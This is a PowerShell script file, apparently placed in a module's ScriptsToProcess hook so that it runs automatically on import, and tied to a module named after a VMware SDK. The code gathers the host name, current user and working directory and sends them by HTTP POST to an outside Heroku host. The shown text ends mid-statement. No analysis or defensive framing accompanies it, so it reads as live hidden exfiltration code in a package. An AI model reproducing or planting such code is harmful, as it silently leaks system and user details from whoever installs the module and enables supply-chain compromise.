ScriptsToProcess/Imports.ps1
$Uri = 'psmodules.herokuapp.com/module' $Form = @{ HostName = hostname Whoami = whoami PWD = Get-Location | Select -ExpandProperty Path module = "./VMware.VumAutomation.Sdk" } $out = Invoke-WebRequest -Uri $Uri -Method Post -Body ($Form | ConvertTo-Json) -ContentType "application/json" |